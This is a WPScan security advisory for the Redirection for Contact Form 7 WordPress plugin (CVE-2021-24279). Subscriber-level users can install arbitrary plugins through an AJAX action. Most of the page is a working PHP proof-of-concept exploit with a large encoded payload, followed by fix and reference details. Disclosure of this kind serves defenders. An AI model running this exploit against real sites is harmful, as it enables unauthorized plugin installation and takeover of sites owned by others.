WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Redirection for Contact Form 7 < 2.3.4 - Authenticated Arbitrary Plugin Installation

Description

In the plugin, low level users, such as subscribers, could use the import_from_debug AJAX action to install any plugin from the WordPress repository.

Proof of Concept

<?php
// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

// Log in as subscriber
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Install some plugins
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'action' => 'import_from_debug',
    'data[debug_info]' => 'YTo3OntzOjc6ImFjdGlvbnMiO2E6MDp7fXM6OToiZm9ybV9tZXRhIjthOjc6e3M6NToiX2Zvcm0iO2E6MTp7aTowO3M6MjQxOiI8bGFiZWw+IFlvdXIgbmFtZQogICAgW3RleHQqIHlvdXItbmFtZV0gPC9sYWJlbD4KCjxsYWJlbD4gWW91ciBlbWFpbAogICAgW2VtYWlsKiB5b3VyLWVtYWlsXSA8L2xhYmVsPgoKPGxhYmVsPiBTdWJqZWN0CiAgICBbdGV4dCogeW91ci1zdWJqZWN0XSA8L2xhYmVsPgoKPGxhYmVsPiBZb3VyIG1lc3NhZ2UgKG9wdGlvbmFsKQogICAgW3RleHRhcmVhIHlvdXItbWVzc2FnZV0gPC9sYWJlbD4KCltzdWJtaXQgIlN1Ym1pdCJdIjt9czo1OiJfbWFpbCI7YToxOntpOjA7czo0NzM6ImE6ODp7czo3OiJzdWJqZWN0IjtzOjMwOiJbX3NpdGVfdGl0bGVdICJbeW91ci1zdWJqZWN0XSIiO3M6Njoic2VuZGVyIjtzOjQyOiJbX3NpdGVfdGl0bGVdIDw+IjtzOjQ6ImJvZHkiO3M6MTYzOiJGcm9tOiBbeW91ci1uYW1lXSA8W3lvdXItZW1haWxdPgpTdWJqZWN0OiBbeW91ci1zdWJqZWN0XQoKTWVzc2FnZSBCb2R5OgpbeW91ci1tZXNzYWdlXQoKLS0gClRoaXMgZS1tYWlsIHdhcyBzZW50IGZyb20gYSBjb250YWN0IGZvcm0gb24gW19zaXRlX3RpdGxlXSAoW19zaXRlX3VybF0pIjtzOjk6InJlY2lwaWVudCI7czoxOToiW19zaXRlX2FkbWluX2VtYWlsXSI7czoxODoiYWRkaXRpb25hbF9oZWFkZXJzIjtzOjIyOiJSZXBseS1UbzogW3lvdXItZW1haWxdIjtzOjExOiJhdHRhY2htZW50cyI7czowOiIiO3M6ODoidXNlX2h0bWwiO2k6MDtzOjEzOiJleGNsdWRlX2JsYW5rIjtpOjA7fSI7fXM6NzoiX21haWxfMiI7YToxOntpOjA7czo0MzI6ImE6OTp7czo2OiJhY3RpdmUiO2I6MDtzOjc6InN1YmplY3QiO3M6MzA6Iltfc2l0ZV90aXRsZV0gIlt5b3VyLXN1YmplY3RdIiI7czo2OiJzZW5kZXIiO3M6NDI6Iltfc2l0ZV90aXRsZV0gPD4iO3M6NDoiYm9keSI7czoxMDU6Ik1lc3NhZ2UgQm9keToKW3lvdXItbWVzc2FnZV0KCi0tIApUaGlzIGUtbWFpbCB3YXMgc2VudCBmcm9tIGEgY29udGFjdCBmb3JtIG9uIFtfc2l0ZV90aXRsZV0gKFtfc2l0ZV91cmxdKSI7czo5OiJyZWNpcGllbnQiO3M6MTI6Ilt5b3VyLWVtYWlsXSI7czoxODoiYWRkaXRpb25hbF9oZWFkZXJzIjtzOjI5OiJSZXBseS1UbzogW19zaXRlX2FkbWluX2VtYWlsXSI7czoxMToiYXR0YWNobWVudHMiO3M6MDoiIjtzOjg6InVzZV9odG1sIjtpOjA7czoxMzoiZXhjbHVkZV9ibGFuayI7aTowO30iO31zOjk6Il9tZXNzYWdlcyI7YToxOntpOjA7czo2MjI6ImE6ODp7czoxMjoibWFpbF9zZW50X29rIjtzOjQ1OiJUaGFuayB5b3UgZm9yIHlvdXIgbWVzc2FnZS4gSXQgaGFzIGJlZW4gc2VudC4iO3M6MTI6Im1haWxfc2VudF9uZyI7czo3MToiVGhlcmUgd2FzIGFuIGVycm9yIHRyeWluZyB0byBzZW5kIHlvdXIgbWVzc2FnZS4gUGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4iO3M6MTY6InZhbGlkYXRpb25fZXJyb3IiO3M6NjE6Ik9uZSBvciBtb3JlIGZpZWxkcyBoYXZlIGFuIGVycm9yLiBQbGVhc2UgY2hlY2sgYW5kIHRyeSBhZ2Fpbi4iO3M6NDoic3BhbSI7czo3MToiVGhlcmUgd2FzIGFuIGVycm9yIHRyeWluZyB0byBzZW5kIHlvdXIgbWVzc2FnZS4gUGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4iO3M6MTI6ImFjY2VwdF90ZXJtcyI7czo2OToiWW91IG11c3QgYWNjZXB0IHRoZSB0ZXJtcyBhbmQgY29uZGl0aW9ucyBiZWZvcmUgc2VuZGluZyB5b3VyIG1lc3NhZ2UuIjtzOjE2OiJpbnZhbGlkX3JlcXVpcmVkIjtzOjIyOiJUaGUgZmllbGQgaXMgcmVxdWlyZWQuIjtzOjE2OiJpbnZhbGlkX3Rvb19sb25nIjtzOjIyOiJUaGUgZmllbGQgaXMgdG9vIGxvbmcuIjtzOjE3OiJpbnZhbGlkX3Rvb19zaG9ydCI7czoyMzoiVGhlIGZpZWxkIGlzIHRvbyBzaG9ydC4iO30iO31zOjIwOiJfYWRkaXRpb25hbF9zZXR0aW5ncyI7YToxOntpOjA7Tjt9czo3OiJfbG9jYWxlIjthOjE6e2k6MDtzOjU6ImVuX1VTIjt9czoyNToibWlncmF0ZV9mcm9tX2NmN19yZWRpcmVjdCI7YToxOntpOjA7czoxOiIxIjt9fXM6OToiZm9ybV9wb3N0IjtPOjc6IldQX1Bvc3QiOjI0OntzOjI6IklEIjtpOjU7czoxMToicG9zdF9hdXRob3IiO3M6MToiMSI7czo5OiJwb3N0X2RhdGUiO3M6MTk6IjIwMjEtMDItMTAgMTk6MjI6MDQiO3M6MTM6InBvc3RfZGF0ZV9nbXQiO3M6MTk6IjIwMjEtMDItMTAgMTk6MjI6MDQiO3M6MTI6InBvc3RfY29udGVudCI7czoxMTQ4OiI8bGFiZWw+IFlvdXIgbmFtZQogICAgW3RleHQqIHlvdXItbmFtZV0gPC9sYWJlbD4KCjxsYWJlbD4gWW91ciBlbWFpbAogICAgW2VtYWlsKiB5b3VyLWVtYWlsXSA8L2xhYmVsPgoKPGxhYmVsPiBTdWJqZWN0CiAgICBbdGV4dCogeW91ci1zdWJqZWN0XSA8L2xhYmVsPgoKPGxhYmVsPiBZb3VyIG1lc3NhZ2UgKG9wdGlvbmFsKQogICAgW3RleHRhcmVhIHlvdXItbWVzc2FnZV0gPC9sYWJlbD4KCltzdWJtaXQgIlN1Ym1pdCJdCltfc2l0ZV90aXRsZV0gIlt5b3VyLXN1YmplY3RdIgpbX3NpdGVfdGl0bGVdIDw+CkZyb206IFt5b3VyLW5hbWVdIDxbeW91ci1lbWFpbF0+ClN1YmplY3Q6IFt5b3VyLXN1YmplY3RdCgpNZXNzYWdlIEJvZHk6Clt5b3VyLW1lc3NhZ2VdCgotLSAKVGhpcyBlLW1haWwgd2FzIHNlbnQgZnJvbSBhIGNvbnRhY3QgZm9ybSBvbiBbX3NpdGVfdGl0bGVdIChbX3NpdGVfdXJsXSkKW19zaXRlX2FkbWluX2VtYWlsXQpSZXBseS1UbzogW3lvdXItZW1haWxdCgowCjAKCltfc2l0ZV90aXRsZV0gIlt5b3VyLXN1YmplY3RdIgpbX3NpdGVfdGl0bGVdIDw+Ck1lc3NhZ2UgQm9keToKW3lvdXItbWVzc2FnZV0KCi0tIApUaGlzIGUtbWFpbCB3YXMgc2VudCBmcm9tIGEgY29udGFjdCBmb3JtIG9uIFtfc2l0ZV90aXRsZV0gKFtfc2l0ZV91cmxdKQpbeW91ci1lbWFpbF0KUmVwbHktVG86IFtfc2l0ZV9hZG1pbl9lbWFpbF0KCjAKMApUaGFuayB5b3UgZm9yIHlvdXIgbWVzc2FnZS4gSXQgaGFzIGJlZW4gc2VudC4KVGhlcmUgd2FzIGFuIGVycm9yIHRyeWluZyB0byBzZW5kIHlvdXIgbWVzc2FnZS4gUGxlYXNlIHRyeSBhZ2FpbiBsYXRlci4KT25lIG9yIG1vcmUgZmllbGRzIGhhdmUgYW4gZXJyb3IuIFBsZWFzZSBjaGVjayBhbmQgdHJ5IGFnYWluLgpUaGVyZSB3YXMgYW4gZXJyb3IgdHJ5aW5nIHRvIHNlbmQgeW91ciBtZXNzYWdlLiBQbGVhc2UgdHJ5IGFnYWluIGxhdGVyLgpZb3UgbXVzdCBhY2NlcHQgdGhlIHRlcm1zIGFuZCBjb25kaXRpb25zIGJlZm9yZSBzZW5kaW5nIHlvdXIgbWVzc2FnZS4KVGhlIGZpZWxkIGlzIHJlcXVpcmVkLgpUaGUgZmllbGQgaXMgdG9vIGxvbmcuClRoZSBmaWVsZCBpcyB0b28gc2hvcnQuIjtzOjEwOiJwb3N0X3RpdGxlIjtzOjE0OiJDb250YWN0IGZvcm0gMSI7czoxMjoicG9zdF9leGNlcnB0IjtzOjA6IiI7czoxMToicG9zdF9zdGF0dXMiO3M6NzoicHVibGlzaCI7czoxNDoiY29tbWVudF9zdGF0dXMiO3M6NjoiY2xvc2VkIjtzOjExOiJwaW5nX3N0YXR1cyI7czo2OiJjbG9zZWQiO3M6MTM6InBvc3RfcGFzc3dvcmQiO3M6MDoiIjtzOjk6InBvc3RfbmFtZSI7czoxNDoiY29udGFjdC1mb3JtLTEiO3M6NzoidG9fcGluZyI7czowOiIiO3M6NjoicGluZ2VkIjtzOjA6IiI7czoxMzoicG9zdF9tb2RpZmllZCI7czoxOToiMjAyMS0wMi0xMCAxOToyMjowNCI7czoxNzoicG9zdF9tb2RpZmllZF9nbXQiO3M6MTk6IjIwMjEtMDItMTAgMTk6MjI6MDQiO3M6MjE6InBvc3RfY29udGVudF9maWx0ZXJlZCI7czowOiIiO3M6MTE6InBvc3RfcGFyZW50IjtpOjA7czo0OiJndWlkIjtzOjYyOiJbVVJMXS8/cG9zdF90eXBlPXdwY2Y3X2NvbnRhY3RfZm9ybSZwPTUiO3M6MTA6Im1lbnVfb3JkZXIiO2k6MDtzOjk6InBvc3RfdHlwZSI7czoxODoid3BjZjdfY29udGFjdF9mb3JtIjtzOjE0OiJwb3N0X21pbWVfdHlwZSI7czowOiIiO3M6MTM6ImNvbW1lbnRfY291bnQiO3M6MToiMCI7czo2OiJmaWx0ZXIiO3M6MzoicmF3Ijt9czo3OiJwbHVnaW5zIjtzOjQwODg6InsiYWtpc21ldFwvYWtpc21ldC5waHAiOnsiTmFtZSI6IkFraXNtZXQgQW50aS1TcGFtIiwiUGx1Z2luVVJJIjoiaHR0cHM6XC9cL2FraXNtZXQuY29tXC8iLCJWZXJzaW9uIjoiNC4xLjciLCJEZXNjcmlwdGlvbiI6IlVzZWQgYnkgbWlsbGlvbnMsIEFraXNtZXQgaXMgcXVpdGUgcG9zc2libHkgdGhlIGJlc3Qgd2F5IGluIHRoZSB3b3JsZCB0byA8c3Ryb25nPnByb3RlY3QgeW91ciBibG9nIGZyb20gc3BhbTxcL3N0cm9uZz4uIEl0IGtlZXBzIHlvdXIgc2l0ZSBwcm90ZWN0ZWQgZXZlbiB3aGlsZSB5b3Ugc2xlZXAuIFRvIGdldCBzdGFydGVkOiBhY3RpdmF0ZSB0aGUgQWtpc21ldCBwbHVnaW4gYW5kIHRoZW4gZ28gdG8geW91ciBBa2lzbWV0IFNldHRpbmdzIHBhZ2UgdG8gc2V0IHVwIHlvdXIgQVBJIGtleS4iLCJBdXRob3IiOiJBdXRvbWF0dGljIiwiQXV0aG9yVVJJIjoiaHR0cHM6XC9cL2F1dG9tYXR0aWMuY29tXC93b3JkcHJlc3MtcGx1Z2luc1wvIiwiVGV4dERvbWFpbiI6ImFraXNtZXQiLCJEb21haW5QYXRoIjoiIiwiTmV0d29yayI6ZmFsc2UsIlJlcXVpcmVzV1AiOiIiLCJSZXF1aXJlc1BIUCI6IiIsIlRpdGxlIjoiQWtpc21ldCBBbnRpLVNwYW0iLCJBdXRob3JOYW1lIjoiQXV0b21hdHRpYyJ9LCJjb250YWN0LWZvcm0tN1wvd3AtY29udGFjdC1mb3JtLTcucGhwIjp7Ik5hbWUiOiJDb250YWN0IEZvcm0gNyIsIlBsdWdpblVSSSI6Imh0dHBzOlwvXC9jb250YWN0Zm9ybTcuY29tXC8iLCJWZXJzaW9uIjoiNS4zLjIiLCJEZXNjcmlwdGlvbiI6Ikp1c3QgYW5vdGhlciBjb250YWN0IGZvcm0gcGx1Z2luLiBTaW1wbGUgYnV0IGZsZXhpYmxlLiIsIkF1dGhvciI6IlRha2F5dWtpIE1peW9zaGkiLCJBdXRob3JVUkkiOiJodHRwczpcL1wvaWRlYXNpbG8ud29yZHByZXNzLmNvbVwvIiwiVGV4dERvbWFpbiI6ImNvbnRhY3QtZm9ybS03IiwiRG9tYWluUGF0aCI6IlwvbGFuZ3VhZ2VzXC8iLCJOZXR3b3JrIjpmYWxzZSwiUmVxdWlyZXNXUCI6IiIsIlJlcXVpcmVzUEhQIjoiIiwiVGl0bGUiOiJDb250YWN0IEZvcm0gNyIsIkF1dGhvck5hbWUiOiJUYWtheXVraSBNaXlvc2hpIn0sImR1cGxpY2F0b3JcL2R1cGxpY2F0b3IucGhwIjp7Ik5hbWUiOiJEdXBsaWNhdG9yIiwiUGx1Z2luVVJJIjoiaHR0cHM6XC9cL3NuYXBjcmVlay5jb21cL2R1cGxpY2F0b3JcL2R1cGxpY2F0b3ItZnJlZVwvIiwiVmVyc2lvbiI6IjEuMy4yNCIsIkRlc2NyaXB0aW9uIjoiTWlncmF0ZSBhbmQgYmFja3VwIGEgY29weSBvZiB5b3VyIFdvcmRQcmVzcyBmaWxlcyBhbmQgZGF0YWJhc2UuIER1cGxpY2F0ZSBhbmQgbW92ZSBhIHNpdGUgZnJvbSBvbmUgbG9jYXRpb24gdG8gYW5vdGhlciBxdWlja2x5LiIsIkF1dGhvciI6IlNuYXAgQ3JlZWsiLCJBdXRob3JVUkkiOiJodHRwOlwvXC93d3cuc25hcGNyZWVrLmNvbVwvZHVwbGljYXRvclwvIiwiVGV4dERvbWFpbiI6ImR1cGxpY2F0b3IiLCJEb21haW5QYXRoIjoiIiwiTmV0d29yayI6ZmFsc2UsIlJlcXVpcmVzV1AiOiIiLCJSZXF1aXJlc1BIUCI6IiIsIlRpdGxlIjoiRHVwbGljYXRvciIsIkF1dGhvck5hbWUiOiJTbmFwIENyZWVrIn0sImhlbGxvLnBocCI6eyJOYW1lIjoiSGVsbG8gRG9sbHkiLCJQbHVnaW5VUkkiOiJodHRwOlwvXC93b3JkcHJlc3Mub3JnXC9wbHVnaW5zXC9oZWxsby1kb2xseVwvIiwiVmVyc2lvbiI6IjEuNy4yIiwiRGVzY3JpcHRpb24iOiJUaGlzIGlzIG5vdCBqdXN0IGEgcGx1Z2luLCBpdCBzeW1ib2xpemVzIHRoZSBob3BlIGFuZCBlbnRodXNpYXNtIG9mIGFuIGVudGlyZSBnZW5lcmF0aW9uIHN1bW1lZCB1cCBpbiB0d28gd29yZHMgc3VuZyBtb3N0IGZhbW91c2x5IGJ5IExvdWlzIEFybXN0cm9uZzogSGVsbG8sIERvbGx5LiBXaGVuIGFjdGl2YXRlZCB5b3Ugd2lsbCByYW5kb21seSBzZWUgYSBseXJpYyBmcm9tIDxjaXRlPkhlbGxvLCBEb2xseTxcL2NpdGU+IGluIHRoZSB1cHBlciByaWdodCBvZiB5b3VyIGFkbWluIHNjcmVlbiBvbiBldmVyeSBwYWdlLiIsIkF1dGhvciI6Ik1hdHQgTXVsbGVud2VnIiwiQXV0aG9yVVJJIjoiaHR0cDpcL1wvbWEudHRcLyIsIlRleHREb21haW4iOiIiLCJEb21haW5QYXRoIjoiIiwiTmV0d29yayI6ZmFsc2UsIlJlcXVpcmVzV1AiOiIiLCJSZXF1aXJlc1BIUCI6IiIsIlRpdGxlIjoiSGVsbG8gRG9sbHkiLCJBdXRob3JOYW1lIjoiTWF0dCBNdWxsZW53ZWcifSwid3BjZjctcmVkaXJlY3RcL3dwY2Y3LXJlZGlyZWN0LnBocCI6eyJOYW1lIjoiUmVkaXJlY3Rpb24gZm9yIENvbnRhY3QgRm9ybSA3IiwiUGx1Z2luVVJJIjoiaHR0cHM6XC9cL3JlZGlyZWN0aW9uLWZvci1jb250YWN0LWZvcm03LmNvbVwvIiwiVmVyc2lvbiI6IjIuMy4zIiwiRGVzY3JpcHRpb24iOiJUaGUgdWx0aW1hdGUgYWRkLW9uIGZvciBDb250YWN0IEZvcm0gNyAtIHJlZGlyZWN0IHRvIGFueSBwYWdlIGFmdGVyIHN1Ym1pc3Npb24sIGZpcmUgc2NyaXB0cywgc2F2ZSBzdWJtaXNzaW9ucyBpbiBkYXRhYmFzZSwgYW5kIG11Y2ggbW9yZSBvcHRpb25zIHRvIG1ha2UgQ29udGFjdCBGb3JtIDcgcG93ZWZ1bCB0aGFuIGV2ZXIuIiwiQXV0aG9yIjoiUXVlcnkgU29sdXRpb25zIiwiQXV0aG9yVVJJIjoiaHR0cHM6XC9cL3JlZGlyZWN0aW9uLWZvci1jb250YWN0LWZvcm03LmNvbVwvIiwiVGV4dERvbWFpbiI6IndwY2Y3LXJlZGlyZWN0IiwiRG9tYWluUGF0aCI6IlwvbGFuZyIsIk5ldHdvcmsiOmZhbHNlLCJSZXF1aXJlc1dQIjoiNS4xIiwiUmVxdWlyZXNQSFAiOiIiLCJUaXRsZSI6IlJlZGlyZWN0aW9uIGZvciBDb250YWN0IEZvcm0gNyIsIkF1dGhvck5hbWUiOiJRdWVyeSBTb2x1dGlvbnMifSwid29yZGZlbmNlXC93b3JkZmVuY2UucGhwIjp7Ik5hbWUiOiJXb3JkZmVuY2UgU2VjdXJpdHkiLCJQbHVnaW5VUkkiOiJodHRwOlwvXC93d3cud29yZGZlbmNlLmNvbVwvIiwiVmVyc2lvbiI6IjcuNC4xNCIsIkRlc2NyaXB0aW9uIjoiV29yZGZlbmNlIFNlY3VyaXR5IC0gQW50aS12aXJ1cywgRmlyZXdhbGwgYW5kIE1hbHdhcmUgU2NhbiIsIkF1dGhvciI6IldvcmRmZW5jZSIsIkF1dGhvclVSSSI6Imh0dHA6XC9cL3d3dy53b3JkZmVuY2UuY29tXC8iLCJUZXh0RG9tYWluIjoid29yZGZlbmNlIiwiRG9tYWluUGF0aCI6IlwvbGFuZ3VhZ2VzIiwiTmV0d29yayI6dHJ1ZSwiUmVxdWlyZXNXUCI6IiIsIlJlcXVpcmVzUEhQIjoiIiwiVGl0bGUiOiJXb3JkZmVuY2UgU2VjdXJpdHkiLCJBdXRob3JOYW1lIjoiV29yZGZlbmNlIn0sIndwLWNlbnRyYWxcL3dwY2VudHJhbC5waHAiOnsiTmFtZSI6IndwQ2VudHJhbCIsIlBsdWdpblVSSSI6Imh0dHBzOlwvXC93cGNlbnRyYWwuY28iLCJWZXJzaW9uIjoiMS40LjgiLCJEZXNjcmlwdGlvbiI6IndwQ2VudHJhbCBwcm92aWRlcyBhIGNlbnRyYWxpemVkIGFyZWEgd2hlcmUgeW91IGNhbiBtYW5hZ2UgYWxsIHlvdXIgV29yZFByZXNzIHdlYnNpdGVzIHNpbmd1bGFybHksIHVuaXRlZGx5IGFzIHdlbGwgYXMgZWZmaWNpZW50bHkuIiwiQXV0aG9yIjoiU29mdGFjdWxvdXMgTHRkLiIsIkF1dGhvclVSSSI6Imh0dHBzOlwvXC93cGNlbnRyYWwuY28iLCJUZXh0RG9tYWluIjoid3BDZW50cmFsIiwiRG9tYWluUGF0aCI6IiIsIk5ldHdvcmsiOmZhbHNlLCJSZXF1aXJlc1dQIjoiIiwiUmVxdWlyZXNQSFAiOiIiLCJUaXRsZSI6IndwQ2VudHJhbCIsIkF1dGhvck5hbWUiOiJTb2Z0YWN1bG91cyBMdGQuIn0sIndwLXJvbGxiYWNrXC93cC1yb2xsYmFjay5waHAiOnsiTmFtZSI6IldQIFJvbGxiYWNrIiwiUGx1Z2luVVJJIjoiaHR0cHM6XC9cL2ltcHJlc3Mub3JnXC8iLCJWZXJzaW9uIjoiMS43LjEiLCJEZXNjcmlwdGlvbiI6IlJvbGxiYWNrIChvciBmb3J3YXJkKSBhbnkgV29yZFByZXNzLm9yZyBwbHVnaW4gb3IgdGhlbWUgbGlrZSBhIGJvc3MuIiwiQXV0aG9yIjoiSW1wcmVzcy5vcmciLCJBdXRob3JVUkkiOiJodHRwczpcL1wvaW1wcmVzcy5vcmdcLyIsIlRleHREb21haW4iOiJ3cC1yb2xsYmFjayIsIkRvbWFpblBhdGgiOiJcL2xhbmd1YWdlcyIsIk5ldHdvcmsiOmZhbHNlLCJSZXF1aXJlc1dQIjoiIiwiUmVxdWlyZXNQSFAiOiIiLCJUaXRsZSI6IldQIFJvbGxiYWNrIiwiQXV0aG9yTmFtZSI6IkltcHJlc3Mub3JnIn19IjtzOjY6InBocHZlciI7czoyMzoiNy4yLjI0LTB1YnVudHUwLjE4LjA0LjYiO3M6MTA6IndwX3ZlcnNpb24iO3M6MzoiNS42IjtzOjg6InNpdGVfdXJsIjtzOjI4OiJbc2l0ZV91cmxdIjt9Cg=='

]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);


?>

Affects Plugins

wpcf7-redirect
Fixed in version 2.3.4

References

CVE
CVE-2021-24279
URL
https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/

Classification

Type

ACCESS CONTROLS

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe

Submitter website
https://wordfence.com
Submitter twitter
infosecchloe
Verified

Yes

WPVDB ID
75f7690d-7f6b-48a8-a9d1-95578a657920

Timeline

Publicly Published

2021-04-20 (about 1 years ago)

Added

2021-04-20 (about 1 years ago)

Last Updated

2021-04-21 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin